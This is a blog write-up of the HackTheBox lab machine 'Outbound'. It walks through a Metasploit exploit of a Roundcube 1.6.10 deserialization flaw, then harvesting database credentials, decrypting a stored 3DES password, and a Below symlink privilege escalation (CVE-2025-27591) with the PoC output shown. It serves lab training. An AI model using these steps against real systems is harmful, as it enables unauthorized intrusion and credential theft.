Outbound Writeup (HackTheBox Easy Machine)

-

As is common in real life pentests, you will start the Outbound box with credentials for the following account tyler / LhKL1o9Nm3X2


Overview

Outbound is an easy Linux machine from HackTheBox. This box depends heavily on enumeration and looking for the slightest of information. It also has several cool vulnerabilities.

We start with identifying a vulnerable Roundcube Webmail web app, which we exploit and get an initial foothold. We find credentials for MySQL database and discover some auth secrets. Combining all of the found information, we decrypt a password for higher privileged user.

During final privilege escalation, we once again find vulnerable software version and use an local priv esc exploit to get root and ultimately pwn the machine.


Nmap scan

Starting with the Nmap scan.

┌──(root㉿kali)-[/home/kali]
└─# nmap -A 10.10.11.77 -T5  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-01 12:59 CEST
Warning: 10.10.11.77 giving up on port because retransmission cap hit (2).
Nmap scan report for outbound.htb (10.10.11.77)
Host is up (0.036s latency).
Not shown: 997 closed tcp ports (reset)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp    open     http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
32783/tcp filtered unknown
Device type: general purpose|router
Running: Linux 5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   30.77 ms 10.10.14.1
2   30.84 ms outbound.htb (10.10.11.77)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.60 seconds

The Nmap scan showed 2 open ports. Port 22 for SSH and port 80 for Nginx web server. Don’t forget to add “outbound.htb” and “mail.outbound.htb” (see Nmap scan) to your “/etc/hosts” file.


Web enumeration

I visited the website and got hit with Roundcube Webmail login page.

Using given credentials, I logged in as “tyler”.

I looked around a bit, seeing no sent nor received mails, no contacts. Next, I clicked the About button and found that version 1.6.10 of Roundcube Webmail was being used, as well as couple installed plugins and their associate versions.

version disclosure

So I did a little research on Roundcube 1.6.10. It turned out that this version has RCE vulnerability.


Exploiting Roundcube RCE vulnerability & getting initial foothold with Metasploit

Luckily for us, there is a dedicated Metasploit module for this vulnerability, making the exploitation process a lot easier. It’s a post-auth RCE via PHP object deserialization.

Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization. (Metasploit)

We need to set the correct credentials, remote host (”mail.outbound.htb”, not the IP address like I set at first) and our local host (set to OpenVPN’s IP address). After that’s done, we can run the exploit, wait couple seconds and get the meterpreter session on the machine as “www-data”.


Found MySQL credentials, accessing Roundcube database & discovering secrets

I launched a shell and immediately noticed that we are in Docker container. That means that we don’t have access to the host machine itself, just to what’s been mounted to this container.

As I usually do when I get a shell, I did some poking around the filesystem at first. I looked for config files, log files, vulnerable kernel or software, permissions etc.


After a bit of digging, I found a config file with MySQL credentials for Roundcube database inside the “/var/www/html” directory. That’s where web files usually live.

MySQL credentials found in Roundcube config file

If we look below, we can find more secrets. We can find the DES key, which will be important later.

DES key found in Roundcube config file

There was MySQL present on the container, so I logged in and found couple hashes for 3 users. And since there was no Python, I was using unstable shell, so the output is little weird because I had to cause an error for it to appear.

It’s hard to say what type of hashes those are. I tried to crack them with CrackStation or Hashcat but got no luck there.


I also looked at other tables in the database. There was another interesting table named “session”. This table contained a lot of base64 encoded strings.

So I opened CyberChef and decoded them. After decoding, I found out some very valuable information. There was a record for user “jacob” with “auth_secret” and “password” attributes.

encryption secrets found after decoding


Decrypting DES cipher, getting passwords for user “jacob” & getting user flag

Now that we know such sensible information like “auth_secret”, we may be able decrypt Jacob’s password and compromise his user account. Recollecting everything we know, we found Jacob’s secrets and the DES key (remember from the Roundcube config file).

DES key - rcmail-!24ByteDESkey*Str
auth_secret - DpYqv6maI9HxDL5GhcCd8JaQQW
password - L7Rv00A8TuwJAr67kITxxcSgnIk25Am/

And since I knew nothing about DES cipher and about it’s decryption, I had to do a bit of googling. Luckily, I found couple good resources (https://www.roundcubeforum.net/index.php?topic=23399.0, https://www.youtube.com/watch?v=4R_kocR1roM) that explained the topic very well. If you’re interested, you can check them out. If not, I’ll still guide you through the process.


First of all, we have to base64 decode the “password” attribute. Then, we’re gonna convert it to hex (for our convenience) and split it into 2 parts, first 8 bytes (highlighted) and the rest of the string.

Next, we open another CyberChef and find Triple DES Decrypt recipe. Since our DES key is so long, we can assume that we are working with 3DES encryption.

We fill our DES key into the “key” field (found in Roundcube config), then the first 8 bytes from the previous step into the “IV” field (Initialization Vector) and finally supply the rest of the password string (all in hex) as input. We should end up with decrypted password.


Bingo! We got Jacob’s password. I tried the creds on SSH, but no luck there. Then I tried them on Roundcube Webmail… Success… There were some mails in the inbox.

First mail was from Tyler, who gave us another password for Jacob.

mail from Tyler

Second mail was from Mel, which informs us that Jacob has the privilege to inspect resource monitoring logs with Below.

“Below” is a modern, “time-traveling” Linux resource monitoring tool that provides historical data for debugging and analysis. Unlike traditional monitors, Below captures all system data and allows you to replay it later, providing a deeper understanding of resource issues over time. (Gemini)

mail from Mel

Nevertheless, we can actually use the password from the first mail to log in via SSH as “jacob”. The user flag sits in his home directory.

jacob@outbound:~$ ls -la
total 28
drwxr-x--- 3 jacob jacob 4096 Jul  8 20:14 .
drwxr-xr-x 5 root  root  4096 Jul  8 20:14 ..
lrwxrwxrwx 1 root  root     9 Jul  8 11:12 .bash_history -> /dev/null
-rw-r--r-- 1 jacob jacob  220 Jun  8 12:14 .bash_logout
-rw-r--r-- 1 jacob jacob 3771 Jun  8 12:14 .bashrc
drwx------ 2 jacob jacob 4096 Jun 11 11:32 .cache
-rw-r--r-- 1 jacob jacob  807 Jun  8 12:14 .profile
-rw-r----- 1 root  jacob   33 Sep  3 04:02 user.txt


Exploiting misconfiguration in Below & getting root flag

I went down my usual priv esc checklist. When I checked Jacob’s sudo permissions, I found out that I can run Below binary with elevated privileges, only with couple exceptions.

jacob@outbound:~$ sudo -l
Matching Defaults entries for jacob on outbound:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jacob may run the following commands on outbound:
    (ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*

Using the “find” tool, I checked where are Below related files present.

jacob@outbound:~$ find / -name below 2>/dev/null
/sys/devices/system/cpu/cpu1/cpuidle/state1/below
/sys/devices/system/cpu/cpu1/cpuidle/state0/below
/sys/devices/system/cpu/cpu0/cpuidle/state1/below
/sys/devices/system/cpu/cpu0/cpuidle/state0/below
/var/log/below
/opt/below
/opt/below/target/release/below
/opt/below/below
/usr/bin/below

Looking at “/opt” directory, I found a config file which contained Below version information 0.8.0.


I googled “Below 0.8.0 exploit” and found this Github repo with a PoC Python script: https://github.com/BridgerAlderson/CVE-2025-27591-PoC.

The weak spot is the world-writable “/var/log/below” directory.

jacob@outbound:/var/log$ ls -la | grep below
drwxrwxrwx   3 root      root               4096 Sep  3 06:04 below

We, as attackers, can symlink Below log file to any root-owned file like “/etc/passwd”. This allows us to write to these files and potentially gain root privileges. Here’s an explanation from another repo:


So I downloaded the Python exploit and transferred it to our target machine. Then I ran it.

jacob@outbound:/tmp$ python3 exploit.py
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] /var/log/below/error_root.log is a regular file. Removing it...
[+] Symlink created: /var/log/below/error_root.log -> /etc/passwd
[+] Target is vulnerable.
[*] Starting exploitation...
[+] Wrote malicious passwd line to /tmp/attacker
[+] Symlink set: /var/log/below/error_root.log -> /etc/passwd
[*] Executing 'below record' as root to trigger logging...
Sep 03 06:03:00.263 DEBG Starting up!
Sep 03 06:03:00.264 ERRO 
----------------- Detected unclean exit ---------------------
Error Message: Failed to acquire file lock on index file: /var/log/below/store/index_01756857600: EAGAIN: Try again
-------------------------------------------------------------
[+] 'below record' executed.
[*] Appending payload into /etc/passwd via symlink...
[+] Payload appended successfully.
[*] Attempting to switch to root shell via 'su attacker'...
root@outbound:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

The root flag waits patiently in the “/root” directory.

And that’s the Outbound machine done!


Summary & final thoughts

Outbound is an easy but tricky Linux machine from HackTheBox. This box has several interesting vulnerabilities. If we want to find them, we have to perform deep enumeration and look mainly for software versions. We login into Roundcube Webmail and exploit RCE vulnerability to get a shell, but we land in a Docker container. So we find credentials for MySQL database and find encoded auth secrets and keys. We use all of this information to decrypt a DES cipher and get the password for another user. We inspect an interesting Below software and find a misconfiguration that causes critical vulnerability. We exploit it to escalate to root.

In my opinion, this machine has some good and straight forward attack paths, if you’re good at enumeration. Although, the DES decryption part can get tricky if you have zero experience with it (like I had). Overall, very solid and enjoyable machine without anything being too confusing. Both beginner and intermediate cybersecurity enthusiasts should be good to go.

Comments

Post a Comment

Popular posts from this blog

Hospital Writeup (HackTheBox Medium Machine)

-
Image
Overview Hospital is a medium Windows machine from HackTheBox. This box makes you go against file upload, kernel exploits, database dumping, command injection and keylogging. We start with bypassing file upload restrictions, while evading functions disabled by PHP config. Once we get the shell on Linux container, we dump the database and discover an exploit for unpatched Linux kernel. The exploit gives us a root shell. Next, we crack the hash and use the password to log into Roundcube Webmail. We then abuse the command injection in EPS files and in GhostScript to get shell as another user with higher privileges. We then notice another session running under our user. We use Metasploit’s Meterpreter to migrate to process which runs on that second session and use Meterpreter’s additional functionality to make a screenshot of the desktop and capture keystrokes from that session. Since the user was logging into Webmail as Administrator, we captured his password in the process.
Read more

Bucket Writeup (HackTheBox Medium Machine)

-
Image
Overview Bucket is a medium Linux machine from HackTheBox. This box introduces you to Cloud hacking (kinda) and lets you play with S3 bucket from AWS, showcasing common misconfigurations. We start with discovering special subdomain, which represents an exposed S3 bucket with files used by the web server. After enumeration with “aws” utility, we find out that we can download and upload files. So we upload PHP reverse shell and get initial foothold. Once in, we dump the exposed DynamoDB database and get the credentials for user “roy”, getting the user flag afterwards. Next, we discover several internal services running. We find the source code in Roy’s project files and discover SSRF vulnerability, which leads to arbitrary file read, allowing us to read any file on the machine, including the root flag.
Read more

Mr Robot Writeup (Vulnhub Intermediate Machine)

-
Image
Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate. Overview Mr. Robot is a beginner-intermediate Linux machine from Vulnhub. It’s based on the show Mr. Robot and has some cool references to it. We start with enumeration of a Wordpress website. We discover an exposed login page and encoded credentials. Once we get into dashboard, we modify a template and gain remote access. Next, we compromise another user by cracking his hash and getting his password. We discover that Nmap has SUID bit set on the machine, which is very insecure because of Nmap’s functionality. We get 3 flags along the way: 1. on special website page, 2. as user flag and 3. as root flag.
Read more